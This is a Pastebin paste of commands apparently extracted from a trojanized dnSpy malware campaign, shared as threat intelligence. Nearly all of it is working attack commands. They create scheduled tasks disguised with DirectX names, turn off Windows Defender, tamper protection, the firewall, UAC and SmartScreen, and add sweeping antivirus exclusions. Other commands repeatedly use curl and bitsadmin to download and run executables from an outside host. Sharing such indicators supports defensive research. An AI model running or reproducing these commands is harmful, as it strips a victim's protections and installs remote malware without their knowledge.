Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Commands executed by Trojanized dnSpy campaign. Extracted by https://twitter.com/malwrhunterteam
- 1.
- @"schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Sc"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force Re"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Force 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore',0)(Window.Close)"""
- 2.
- @"schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 21 /rl highest /tn ""Microsoft\Windows\DirectX\Force 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore',0)(Window.Close)"""
- 3.
- @"schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension .exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionExtension exe -ErrorAction Ignore',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess cmd.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 22 /rl highest /tn ""Microsoft\Windows\DirectX\Force 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess powershell.exe -Force',0)(Window.Close)"""
- 4.
- @"schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess mshta.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionProcess *.exe -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Force 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c powershell Add-MpPreference -ExclusionPath C:\* -Force',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 01"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Features'' /v TamperProtection /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 02"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiSpyware /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 03"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender'' /v DisableAntiVirus /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 23 /rl highest /tn ""Microsoft\Windows\DirectX\Services 04"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine'' /v MpEnablePus /t REG_DWORD /d 0 /f',0)(Window.Close)"""
- 5.
- @"schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 05"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 06"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableIOAVProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 07"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 08"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 09"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 10"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\Reporting'' /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 24 /rl highest /tn ""Microsoft\Windows\DirectX\Services 11"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f',0)(Window.Close)"""
- 6.
- @"schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 12"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SpynetReporting /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 13"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet'' /v SubmitSamplesConsent /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 14"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 15"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 16"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 17"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ''Windows Defender'' /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 25 /rl highest /tn ""Microsoft\Windows\DirectX\Services 18"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f',0)(Window.Close)"""
- 7.
- @"schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 19"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\*\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 20"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 21"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 22"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 23"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 24"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 26 /rl highest /tn ""Microsoft\Windows\DirectX\Services 25"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
- 8.
- @"schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 26"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 27"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 28"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 29"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 30"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 31"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 27 /rl highest /tn ""Microsoft\Windows\DirectX\Services 32"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\System\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f',0)(Window.Close)"""
- 9.
- @"schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 33"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'' /v DpaDisabled /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 34"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer'' /v SmartScreenEnabled /t REG_SZ /d Off /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 35"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet'' /v DontReportInfectionInformation /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 36"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\Sense /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 37"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformatio /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 38"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 29 /rl highest /tn ""Microsoft\Windows\DirectX\Services 39"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f',0)(Window.Close)"""
- 10.
- @"schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 40"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 41"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 30 /rl highest /tn ""Microsoft\Windows\DirectX\Services 42"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('reg delete HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService /f',0)(Window.Close)"""
- 11.
- @"schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services FW"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c netsh advfirewall set allprofiles state off',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services UAC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 31 /rl highest /tn ""Microsoft\Windows\DirectX\Services CURL"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer CURL http://4api.net/curl.exe %windir%\system32\curl.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 150 & curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc ONLOGON /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c timeout 300 & bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"""
- 12.
- @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/c.exe -o C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCore"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BCore http://4api.net/c.exe C:\Trash\c.exe & C:\Trash\c.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/ck.exe -o C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BCK"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/ck.exe C:\Trash\ck.exe & C:\Trash\ck.exe',0)(Window.Close)"""
- 13.
- @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbot.exe -o C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBTC"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbot.exe C:\Trash\cbot.exe & C:\Trash\cbot.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/cbo.exe -o C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BBot"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/cbo.exe C:\Trash\cbo.exe & C:\Trash\cbo.exe',0)(Window.Close)"""
- 14.
- @"schtasks /create /f /sc minute /mo 300 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/m.exe -o C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /tn ""Microsoft\Windows\DirectX\Services MN"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/m.exe C:\Trash\m.exe & C:\Trash\m.exe',0)(Window.Close)"""
- 15.
- @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/d.exe -o C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BAV"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/d.exe C:\Trash\d.exe & C:\Trash\d.exe -d',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 20 /rl highest /tn ""Microsoft\Windows\DirectX\Services Dir"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c mkdir c:\Trash & attrib +h C:\Trash & attrib +h C:\Trash\*.* & exit',0)(Window.Close)"""
- 16.
- @"schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/nnj.exe -o C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BNJ"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/nnj.exe C:\Trash\nnj.exe & C:\Trash\nnj.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 300 /rl highest /tn ""Microsoft\Windows\DirectX\Services CQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c curl http://4api.net/qs.exe -o C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"" & schtasks /create /f /sc minute /mo 600 /rl highest /tn ""Microsoft\Windows\DirectX\Services BQS"" /tr ""mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer BX http://4api.net/qs.exe C:\Trash\qs.exe & C:\Trash\qs.exe',0)(Window.Close)"""
- 17.
- @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"
- 18.
- @"Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0"
Add Comment
Please, Sign In to add comment